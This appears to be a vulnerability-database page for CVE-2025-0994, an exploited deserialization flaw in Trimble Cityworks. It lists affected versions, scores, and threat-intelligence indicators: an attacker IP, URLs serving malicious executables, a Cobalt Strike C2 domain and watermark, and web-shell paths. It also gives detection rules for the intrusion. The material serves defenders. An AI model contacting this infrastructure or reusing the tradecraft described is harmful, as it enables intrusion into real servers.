cbcvebase.
CVE-2025-0994
published 2025-02-06

CVE-2025-0994: Trimble Cityworks versions prior to 15.8.9 and Cityworks with office companion versions prior to 23.10 are vulnerable to a deserialization vulnerability. This…

PriorityP190high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
KEVITW
CISA Known Exploited Vulnerabilitydue 2025-02-28
Exploited in the wild
EPSS
27.43%
97.8th percentile
Trimble Cityworks versions prior to 15.8.9 and Cityworks with office companion versions prior to 23.10 are vulnerable to a deserialization vulnerability. This could allow an authenticated user to perform a remote code execution attack against a customer’s Microsoft Internet Information Services (IIS) web server.

Affected

3 ranges
VendorProductVersion rangeFixed in
trimblecityworks< 23.1023.10
trimblecityworks< 15.8.915.8.9
trimblecityworks>= 23.0 < 23.1023.10

Detection & IOCsextracted from sources · hover to see the quote

ip192.210.239.172
port3219
filenameLVLWPH.exe
filenameMCUCAT.exe
filenameTJPLYT.exe
filenamez44.exe
domaincdn.lgaircon.xyz
domainlgaircon.xyz
urlhttp://192.210.239.172:3219/LVLWPH.exe
urlhttp://192.210.239.172:3219/MCUCAT.exe
urlhttp://192.210.239.172:3219/TJPLYT.exe
urlhttp://192.210.239.172:3219/z44.exe
urlcdn.lgaircon.xyz/jquery-3.3.1.min.js
urlcdn.lgaircon.xyz/jquery-3.3.2.min.js
urllgaircon.xyz/owa/OPWiaTU-ZEbuwIAKGPHoQAP006-PTsjBGKQUxZorq2
urllgaircon.xyz/owa/idQ0RKiA2O1i9KKDzKRdmIBmkA8uQxmFzpBGRzGjaqG
otherWatermark: 987654321
pathc:\inetpub\wwwroot\CityworksServer\WebSite\Assets
pathc:\inetpub\wwwroot\CityworksServer\Uploads\
process%windir%\syswow64\dllhost.exe
process%windir%\sysnative\dllhost.exe
process%windir%\syswow64\gpupdate.exe
process%windir%\sysnative\gpupdate.exe
commandcmd.exe /c dir c:\inetpub\wwwroot\CityworksServer\WebSite
  • Detect web shell deployment (AntSword, chinatso/Chopper, Behinder) under the Cityworks IIS web root paths, particularly c:\inetpub\wwwroot\CityworksServer\.
  • Hunt for Cobalt Strike beacons with Watermark 987654321 and C2 domain lgaircon.xyz; both beacon configs share this watermark value.
  • Detect Cobalt Strike beacon traffic to lgaircon.xyz mimicking OWA paths (/owa/OPWiaTU-ZEbuwIAKGPHoQAP006-PTsjBGKQUxZorq2 and /owa/idQ0RKiA2O1i9KKDzKRdmIBmkA8uQxmFzpBGRzGjaqG) with a fake Microsoft telemetry cookie header.
  • Alert on PowerShell Invoke-WebRequest calls from IIS worker processes downloading executables from 192.210.239.172 on port 3219 to C:\windows\temp\.
  • TetraLoader (Rust-based) injects shellcode into notepad.exe; monitor for notepad.exe spawned by non-interactive parent processes or with injected remote threads.
  • Monitor for Cobalt Strike spawn-to processes dllhost.exe and gpupdate.exe being used as injection targets (x86: syswow64, x64: sysnative), which are non-default spawn-to values indicating custom beacon profiles.
  • Detect staging of files from the Cityworks web root into the Uploads subdirectory, which UAT-6382 used to pre-position data for exfiltration.
  • ·The Cobalt Strike beacon C2 URI paths for the second beacon config (/owa/...) mimic legitimate Microsoft OWA endpoints; defenders should not whitelist OWA-like URIs to lgaircon.xyz.
  • ·Trimble warns that some on-premises Cityworks deployments may have overprivileged IIS identity permissions; IIS should not run with local or domain-level administrative privileges, which amplifies RCE impact.
  • ·Some Cityworks deployments have incorrect attachment directory configurations; the vendor recommends restricting attachment root folders to contain only attachments to limit post-exploitation web shell placement.
  • ·TetraLoader is built with the publicly available MaLoader framework (appeared on GitHub December 2024); signatures for TetraLoader may need to account for multiple encoding/encryption options MaLoader supports.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv4.08.6HIGHCVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck8.6HIGH
cisa8.6HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.